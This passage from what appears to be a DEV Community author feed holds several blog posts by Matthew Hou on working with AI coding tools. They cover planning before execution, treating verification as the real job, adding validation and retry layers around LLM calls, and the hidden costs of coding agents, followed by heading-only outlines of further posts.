Kent Beck calls this the distinction between "augmented coding" and "vibe coding." The latter is hoping the AI gives you working code. The former is knowing what working code looks like before the AI writes it.

2. I treat verification as the actual job.

I used to think of code review as a chore you do after the real work. Now it IS the real work. StrongDM's team took this to the extreme — their "Dark Factory" setup has zero human code review. All investment goes into tests, tools, and simulations. The humans define what correct looks like. The machines do everything else.

I'm not there yet, but the direction is clear: my value isn't in writing code. It's in defining what "correct" means for my specific context.

3. I stopped measuring productivity in output.

More lines of code is not more productivity. More PRs is not more productivity. The Harness 2025 survey found that 67% of developers spend more time debugging AI-generated code than they would have spent writing it themselves. If that's you, generating more code faster is making things worse, not better.

The metric I care about now: how much of my attention went to decisions only I can make? Architecture choices, user-facing trade-offs, "should we even build this" — that's the stuff AI can't do. Everything else, I want to automate not because it's faster, but because it frees up mental bandwidth for the hard problems.

The Uncomfortable Truth About AI Coding Productivity

If the METR study is right — if AI tools don't actually save time for experienced developers on familiar codebases — then the value proposition of AI coding isn't "10x productivity." It's something more subtle:

The ability to spend your attention on higher-impact work, if you're disciplined enough to actually do it.

That's a much harder sell than "write code faster." It requires you to know what high-impact work looks like, and to resist the dopamine hit of watching AI generate 200 lines in 3 seconds.

I don't have this figured out. Some days I still catch myself vibe coding and pretending the output is good because it compiled. The METR study's perception gap isn't just about their participants — it's about all of us.

But at least now, when I feel productive with AI, I stop and ask: am I actually productive, or does it just feel that way?

I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.

Matthew Hou — Mon, 23 Feb 2026 15:07:55 +0000

There's a popular narrative right now: let AI handle your code, review the output, ship faster. I bought into it. I still use AI coding tools every single day.

But after months of daily use, I've developed a very specific list of things I will and won't let AI coding tools touch. Not from theory — from watching things break.

If you're in the same position — using AI daily but building up a quiet list of "not this" — I think you'll recognize what's here. And I'm curious what's on your list that isn't on mine.

What AI Coding Tools Are Genuinely Great At

Boilerplate. CRUD endpoints, validation schemas, form wiring, data transformation layers. AI handles repetition without getting bored or introducing typos. What used to take 30 minutes of mechanical typing now takes 3 minutes of review.

Refactoring with clear instructions. "Separate business logic from the transport layer" — give AI a well-scoped structural task and it produces directionally correct results. Not perfect, but a solid starting point that saves real time.

Test scaffolding. Happy path tests, edge case templates, baseline coverage expansion. AI can generate 20 test cases in the time it takes me to write 3. The catch is that I still need to review every assertion for domain correctness.

What I've Stopped Trusting AI Coding Tools With

Anything involving implicit system knowledge.

Your codebase has invisible dependencies. A 30-second timeout that exists for a reason nobody documented. A cache that depends on referential equality. A hook that adds global listeners. AI doesn't know these things exist. It will confidently change them, and everything will compile. The bug shows up three weeks later.

Architectural decisions across files.

AI optimizes locally. It writes clean code for the file you're looking at. But it doesn't protect global coherence. I've watched AI introduce three slightly different patterns for the same abstraction across different files in the same PR. Each file looked great in isolation. The codebase got worse.

Error handling in async code.

This one bit me hard. AI generates async/await code that looks correct but has subtle issues: missing error propagation, overly optimistic null assumptions, try/catch blocks that swallow important failures. The code compiles and passes basic tests. Then production surfaces the edge cases.

The Mental Model for Using AI Coding Tools Effectively

I treat AI like a fast junior engineer who has read every Stack Overflow answer but has never maintained a production system. That means:

Great for generating options. "Show me three ways to structure this." Then I pick the one that fits the existing codebase.
Bad for making judgment calls. "Should we add a cache here?" requires understanding traffic patterns, consistency requirements, and operational complexity that AI simply doesn't have.
Excellent for the first 80%. AI gets me to a working draft fast. The last 20% — making it production-ready — still takes the same human effort it always did.

How AI Coding Tools Are Changing the Developer Role

Here's what I keep thinking about:

Nobody knows what software engineering looks like in 2 years. That's terrifying. The skills that matter are shifting under us in real time. Last month @gass left a blunt comment on my METR post: "If you are programmer, program you lazy bastard." It made me laugh, but there's something real underneath it — if you outsource everything to AI, you lose the judgment that makes you valuable.

But also — a solo developer can now build things that took a team of 10. That's unprecedented and genuinely exciting. The developers who'll thrive aren't the ones who generate the most code. They're the ones who reject the most output.

The only way I've found to stay sane is to build in public and learn from people who push back on my assumptions. @mahima_heydev has left several comments across my posts about the hidden cost of AI not being time but confidence — people ship changes they don't fully understand. That observation keeps evolving my thinking.

The Best AI Coding Tools Shift Thinking, Not Typing

The biggest change isn't that I code faster. It's that I think differently.

I spend more time on constraints before I start. I write clearer specifications. I think about edge cases upfront because I know AI won't catch them later.

AI didn't reduce the thinking. It moved where the thinking happens — from implementation to design. And honestly, that's probably where it should have been all along.

One Rule for Using Any AI Coding Tool

Don't let AI handle something you couldn't review yourself. If you don't understand the output well enough to spot a subtle bug, you're not saving time — you're creating debt.

The best AI-assisted developers I know aren't the ones who generate the most code. They're the ones who reject the most output. That judgment is the actual skill.

What's on Your List?

I genuinely don't take your attention for granted. You could be scrolling past this, but you stopped to think about where AI actually fails. If you've hit a wall I haven't described — or if you trust AI with something I've written off — I want to hear it.

Some of the best corrections to my workflow came from someone saying "actually, that's not right" in a comment section. That's worth more than any tutorial.

Your AI Agent Doesn't Need More Intelligence — It Needs Better Plumbing

Matthew Hou — Mon, 23 Feb 2026 14:51:25 +0000

If you're building with AI right now, you've probably had this moment: the demo works perfectly, you ship it, and then production surfaces every edge case the model never considered. Hallucinated IDs. Ignored constraints. Fluent, confident, wrong output.

You're not alone. I've been there — and based on the conversations happening in my comment sections, a lot of you are hitting the exact same wall.

Last week I watched a demo where an AI agent processed a customer refund using a hallucinated customer ID. The LLM was confident. The code was clean. The refund went through. Nobody caught it for three minutes.

That three-minute gap is the entire story of AI in production right now.

What your comments taught me

After my METR study post, @leob left a comment that reframed how I think about this:

"Maybe we should move away from the idea of using AI tools for 'coding' only, and use it more in an 'advisory' role instead — as virtual brainstorming buddies."

That stuck with me. Because the reliability problem isn't about the AI's reasoning — it's about us treating generation as the finished product instead of the starting point. @signalstack put it even more sharply: "Generation got cheap. Verification didn't."

Those two comments are basically the thesis of this article.

The demo-to-production gap is a plumbing problem

Most AI demos are one prompt, one model call, one result. It looks like magic. Then you ship it and discover the model hallucinates, ignores constraints, and produces outputs that are fluent but subtly wrong.

The fix isn't a better model. It's better plumbing.

When I started running AI workflows daily, I assumed the bottleneck would be model quality. It wasn't. The bottleneck was everything around the model: input validation, output verification, retry logic, state management, error handling.

The boring stuff. The plumbing.

What "plumbing" actually looks like

Here's the architecture shift that made my AI workflows reliable:

Before: User request → LLM call → output to user

After: User request → input cleaning → LLM call → output validation → decision gate (pass/retry/escalate) → formatting → output to user

That "decision gate" is the key piece most people skip. It's where you check: did the model actually follow the constraints? Is this output structurally valid? Does this make sense given what we know?

Sometimes the gate triggers a retry with a modified prompt. Sometimes it routes to a different model. Sometimes it just says "I can't confidently answer this" — which is infinitely better than confidently being wrong.

The cost reality nobody talks about

Token prices are dropping. People see this and think "AI is getting cheaper."

Not exactly.

A single model call is cheap. A reliable system rarely uses a single call. One user request might trigger: generation, evaluation, regeneration, formatting, tool calls. The user sees one answer. The backend ran a small workflow.

I've seen my per-request cost go up 3-5x after adding proper validation layers. But my error rate dropped by an order of magnitude. That trade-off is worth it every time.

The analogy I keep coming back to: saying "tokens are cheap, therefore AI is cheap" is like saying screws are cheap, therefore airplanes are cheap.

Three patterns that actually work

1. Validate outputs against a schema, not vibes

Don't just check if the output "looks right." Define a concrete schema for what you expect. If your agent is supposed to return a JSON with specific fields, validate every field. If it's generating code, run it against your test suite before accepting it.

2. Build retry loops with variation

When validation fails, don't just retry with the same prompt. Modify something: add the error message as context, simplify the request, try a different model. I typically cap at 3 retries before escalating to a human or returning an explicit failure.

3. Separate the "thinking" from the "doing"

Let the LLM reason about what to do. Then have a separate, deterministic system actually execute it. The LLM decides "refund customer X $50." A validation layer checks: does customer X exist? Is $50 within the refund policy? Only then does the actual API call happen.

The uncomfortable truth

Nobody knows what software engineering looks like in 2 years. That's terrifying. The tools change faster than anyone can keep up.

But also — making AI reliable is just engineering. Every powerful but unreliable technology goes through this phase. Databases needed ACID. Networks needed TCP. AI needs its own reliability layer.

The engineers who figure out this plumbing will be the ones building things that actually work. The ones chasing the next model release will keep rebuilding their demos.

The only way I've found to stay sane through this is to build in public and learn from people who push back on my assumptions. @mahima_heydev pointed out in my last post that the real hidden cost isn't time — it's confidence. People ship changes they don't fully understand. That observation changed how I think about validation layers: they're not just catching bugs, they're preserving your ability to trust your own system.

What I want to hear from you

If you're running AI in production — what's your plumbing look like? Are you hand-rolling validation, using a framework, or still flying without a net?

I genuinely appreciate every one of you who takes the time to share what you're seeing. Some of the best architectural decisions in my projects started as a sentence someone left in a comment. This isn't a platitude — it's literally how my last three posts evolved.

If something here doesn't match your experience, I want to know. That's how this gets better.

P.S. I package what I learn into tools. If you want executable workflow files that add validation gates and retry logic to your AI workflows automatically: 3 Skill Files.

LLMs in Production Are Not Magic — They're Plumbing

Matthew Hou — Mon, 23 Feb 2026 10:02:34 +0000

There's a great post on Dev.to right now arguing that LLMs are not deterministic and making them reliable is expensive. The author is right about both things. But I want to push on the "expensive" part, because I think most developers overestimate the difficulty and underestimate how mundane the solutions actually are.

Making LLMs reliable in production is not an AI problem. It's a plumbing problem.

The Demo vs. Production Gap

Every AI demo looks magical. One prompt, one model call, one beautiful result.

Then you try to ship it.

The model hallucinates a field name. It returns JSON with a trailing comma. It gives you a confident answer that's wrong in a way you'd never anticipate. It works perfectly 97 times out of 100, and the 3 failures are catastrophic.

This is not a bug. This is the fundamental nature of probabilistic systems. If you're surprised by it, you haven't shipped one yet.

The Boring Solutions That Actually Work

Here's what I've found works in practice, running AI-powered workflows daily:

1. Structured Output, Always

Never let the model free-form respond when you need to act on the output. Use JSON mode, function calling, or whatever structured output format your model supports. If the model's response needs to be parsed by code downstream, force it into a schema.

This alone eliminates maybe 60% of production issues.

2. Validate Like It's User Input

Treat every LLM response the way you'd treat a form submission from a user. Validate types, check required fields, verify that values are within expected ranges.

# Don't do this
result = call_llm(prompt)
do_something(result["action"])

# Do this
result = call_llm(prompt)
validated = validate_schema(result, expected_schema)
if validated.errors:
    retry_or_fallback()
else:
    do_something(validated.data["action"])

I know this looks obvious. I'm constantly amazed by how many production AI systems skip this step.

3. Retry With Variation

When a call fails validation, don't just retry the same prompt. Rephrase slightly, add an example of the expected output, or increase the temperature slightly. In my experience, 2-3 retries with small prompt variations will recover from most transient failures.

The key word is "most." You still need a fallback for when retries don't work.

4. Chain Reliability Compounds

This is where it gets interesting. If one LLM call is 95% reliable, a chain of 5 calls is about 77% reliable (0.95^5). That's a real problem.

The solution is boring: make each step independently validated, with clear success/failure signals. If step 3 fails, you need to know whether to retry step 3 or go back to step 2. You need checkpointing.

Sound familiar? It's the exact same pattern as any distributed system. Message queues, retry policies, dead letter queues, idempotency keys. The LLM is just another unreliable service in your architecture.

5. Log Everything

In a traditional app, you can reproduce bugs. With LLMs, the same input might produce different output tomorrow. Log the full prompt, the full response, and the validation result for every call. When something goes wrong in production, you'll need this to understand what happened.

The Mental Shift

The developers I see struggling with LLM reliability are usually thinking about it as an AI problem. They're reading papers about prompt engineering, fine-tuning, and model selection.

The developers who ship reliably are thinking about it as an infrastructure problem. The LLM is a service that sometimes returns bad data. Build accordingly.

That's not exciting. It's not going to get you Twitter engagement. But it works.

One Thing To Try

If you have an LLM call in production right now without output validation, add it this week. Just schema validation on the response. Track how often it fails. You'll learn more from that one metric than from any blog post (including this one).

The AI Coding Workflow That Actually Works: Separate Planning from Execution

Matthew Hou — Mon, 23 Feb 2026 10:01:51 +0000

There's a blog post making the rounds right now about separating planning from execution when using Claude Code. It resonated with me because I've been doing something similar — and I think the principle applies way beyond any single tool.

Here's the AI coding workflow I've landed on after months of daily AI-assisted coding — and it's the only AI workflow automation pattern that consistently works.

Why Most AI Workflow Automation Fails

Most developers use AI coding tools like a magic 8-ball. Type a vague request, get a vague result, then spend 20 minutes fixing what it got wrong.

The issue isn't the model. It's that you're asking it to do two very different jobs at the same time:

Figure out what needs to happen (planning)
Write the actual code (execution)

These require different kinds of thinking. When you mash them together, you get code that's structurally okay but solves the wrong problem, or code that solves the right problem but in a way that doesn't fit your codebase.

This is why most attempts at AI workflow automation fall flat — people automate the wrong step.

How to Build an AI Coding Workflow That Works

Before I touch any code, I write out what I want in plain English. Not a prompt — a spec. Something like:

"Add rate limiting to the /api/search endpoint. Use a sliding window counter stored in Redis. Limit: 100 requests per minute per API key. Return 429 with a Retry-After header when exceeded. Add middleware so other endpoints can use the same pattern."

That's it. No code. No implementation details. Just a clear statement of what the result should look like.

Then I feed this to the AI as the planning step: "Break this down into subtasks. Don't write code yet."

The model comes back with a task list. I review it, adjust priorities, remove things it hallucinated, add things it missed. Takes about 2 minutes.

Then I hand each subtask to the AI for execution, one at a time.

Why Separating Planning from Execution Works

Three reasons:

1. You catch bad assumptions early. If the AI's plan includes "create a new Redis connection for each request," you spot that in the planning phase and correct it before any code exists. Way cheaper than debugging it later.

2. You maintain architectural control. The AI writes code within the boundaries you set, not whatever it thinks is clever. Your codebase stays consistent.

3. The code quality goes way up. Smaller, well-scoped tasks produce better code than "build me a feature." It's the same reason we break work into tickets for human engineers.

My AI Workflow Automation Setup (Step by Step)

Here's what a typical session looks like:

I write the spec — 2-5 sentences describing the end state
AI creates the plan — ordered subtask list with file paths
I review and adjust — usually takes 2 minutes, sometimes catches major issues
AI executes each subtask — I review each output before moving on
I handle the integration — connecting the pieces, running tests, verifying behavior

Steps 1 and 3 are where I add the most value. Steps 2 and 4 are where AI adds the most value. Step 5 is shared.

This workflow works with any AI coding tool — Claude Code, Cursor, GitHub Copilot, or even ChatGPT with copy-paste. The principle is tool-agnostic.

The Uncomfortable Truth About AI Coding Speed

This workflow is slower than "just ask the AI to build it." At least, it feels slower. But when I tracked my actual time over a month, the planning-first approach was about 40% faster end-to-end because I almost never had to throw away large chunks of AI-generated code and start over.

The biggest time sink in AI-assisted coding isn't generation — it's rework. Planning eliminates most rework.

What AI Workflow Automation Can't Replace

Not everything belongs in this workflow:

Bug investigation — I still read stack traces and reproduce issues myself. AI is great at suggesting fixes, terrible at understanding why something broke in your specific environment.
Architecture decisions — AI can propose options, but I decide. It doesn't know the team's priorities or the product roadmap.
Code review — I review everything the AI writes. Every line. Not because I don't trust it, but because I need to understand it for when it breaks at 2am.

Try This AI Coding Workflow Tomorrow

If you're currently using AI as a code generator, try one thing tomorrow: before your next feature, write down what you want in 3 sentences. Ask the AI to make a plan. Review the plan. Then start coding.

You'll probably be surprised how much better the output is.

The Real Cost of Running AI Coding Agents (It's Not What You Think)

Matthew Hou — Sun, 22 Feb 2026 14:06:31 +0000

Everyone talks about AI coding agents saving time. Nobody talks about the hidden costs that show up after the first week.

I've been running AI agents as part of my daily dev workflow for months now. Here's the honest breakdown of what it actually costs — and I'm not just talking about API bills.

The Obvious Cost: Tokens

Yes, tokens add up. If you're using a coding agent that reads your full codebase context every time, you can burn through $20-50/day easy on a medium project. Most people figure this out fast and either optimize or quit.

But this is the smallest cost.

The Hidden Cost: Context Switching Tax

Here's what nobody warns you about. When an AI agent is generating code in one file, you naturally start reviewing another file, or checking Slack, or reading docs. Feels productive, right?

It's not. You're paying a context switching tax every time you come back to evaluate the AI's output. I tracked this for two weeks:

Without AI agent: ~4 deep focus blocks per day, avg 45 min each
With AI agent (multitasking): ~7 shallow blocks, avg 18 min each

Total productive minutes were similar. But the quality of my thinking in those 45-min blocks was dramatically better than the 18-min ones.

The Biggest Cost: Atrophied Debugging Skills

This one creeps up on you. After a month of letting agents handle most bug fixes, I noticed something: when I hit a genuinely hard bug that the AI couldn't solve, I was slower at debugging it than I would've been before.

My mental model of the codebase had gaps. I'd skipped the "boring" debugging that actually builds deep understanding.

What I Changed

I don't use AI agents less — I use them differently:

No multitasking during generation. I watch what the agent does. It's slower but I maintain context.
Manual debugging Fridays. One day a week, no AI assistance for bug fixes. Keeps the skill sharp.
Token budgets, not time budgets. I set a daily token limit. When it runs out, I code manually. Forces me to be deliberate about what I delegate.

The Bottom Line

AI coding agents are genuinely useful. But if you're not tracking what you're giving up to use them, you're optimizing for speed while losing depth.

The developers who'll thrive aren't the ones using the most AI. They're the ones who know exactly when to use it and when to put it away.

DEV Community: Matthew Hou

You Asked AI to Analyze Your Users. The Report Looks Amazing. It's Probably Wrong.

Article Draft v3

cover_image: TBD

The Experiment

What AI-Generated "Insight" Actually Looks Like

Three Failure Patterns That Show Up Every Time

Where AI Analysis Actually Works (and Where It Doesn't)

The Framework I Use Now

The Honest Gaps

What's Your Validation Step?

The 60-Year-Old Developer Who Broke Hacker News: This Is What Vibe Coding Actually Looks Like

The Story That Hit 1,000+ Points

What Is Vibe Coding?

The Real Story in the Comments

The Generational Divide Nobody's Talking About

What This Actually Changes

The Part Nobody Wants to Say Out Loud

More on AI Coding Tools and Workflows

Every Website Will Soon Have Two Versions: The AI SEO Problem Nobody Is Solving

How AI Is Changing Website Visibility (Worse Each Time)

The Dual-Version Web: Why Every Site Needs an LLM-Friendly Version

The AI SEO Problem: No Business Model (Yet)

What AI SEO and LLM Optimization Will Look Like

The Open Questions About AI Search and Content

More on AI Coding Tools and Workflows

GitHub Copilot Security Review: It Executes Malware With Zero Approval

The GitHub Copilot Security Vulnerability Explained

GitHub Copilot Security Issues: A Pattern of Failures

Why GitHub Copilot Security Reviews Don't Work

GitHub Copilot Security Best Practices: The CI/CD Safety Net

The Bigger Picture: AI Code Security in 2026

How to Secure Your AI Coding Tools Setup

More on AI Coding Tools and Workflows

I Stopped Trying to Make AI Smarter. I Made My Code Dumber.

What I Learned From You

The 38-out-of-40 Problem With Vibe Coding

The Pattern That Makes AI Coding Tools Actually Work

How to Structure Code for AI Coding Tools (Designing for a Dumb AI)

Explicit interfaces everywhere

Smaller files

Tests that document behavior, not implementation

Configuration in one place

No "clever" code

The Uncomfortable Truth About Vibe Coding

The Trade-off Between Vibe Coding and Code Quality

What I'm Not Saying

The Question I Keep Coming Back To

More on AI Coding Tools and Workflows

I Gave AI the Same Task Twice. The Only Difference Was 30 Lines of Markdown.

What I learned from your comments

The experiment

The uncomfortable math

What actually works: 30 lines of markdown

What it doesn't solve

The era question

The open question (I actually want your answer)

Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.

The Perception Gap Is the Real Finding

Why AI Coding Tools Don't Save Time (Yet)

How to Use AI Coding Tools Effectively (What I Changed)

1. I front-load the thinking, not the prompting.

2. I treat verification as the actual job.

3. I stopped measuring productivity in output.

The Uncomfortable Truth About AI Coding Productivity

More on AI Coding Tools and Productivity

I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.

What AI Coding Tools Are Genuinely Great At

What I've Stopped Trusting AI Coding Tools With

The Mental Model for Using AI Coding Tools Effectively

How AI Coding Tools Are Changing the Developer Role

The Best AI Coding Tools Shift Thinking, Not Typing

One Rule for Using Any AI Coding Tool

What's on Your List?

More on AI Coding Tools and Workflows

Your AI Agent Doesn't Need More Intelligence — It Needs Better Plumbing

What your comments taught me

The demo-to-production gap is a plumbing problem

What "plumbing" actually looks like

The cost reality nobody talks about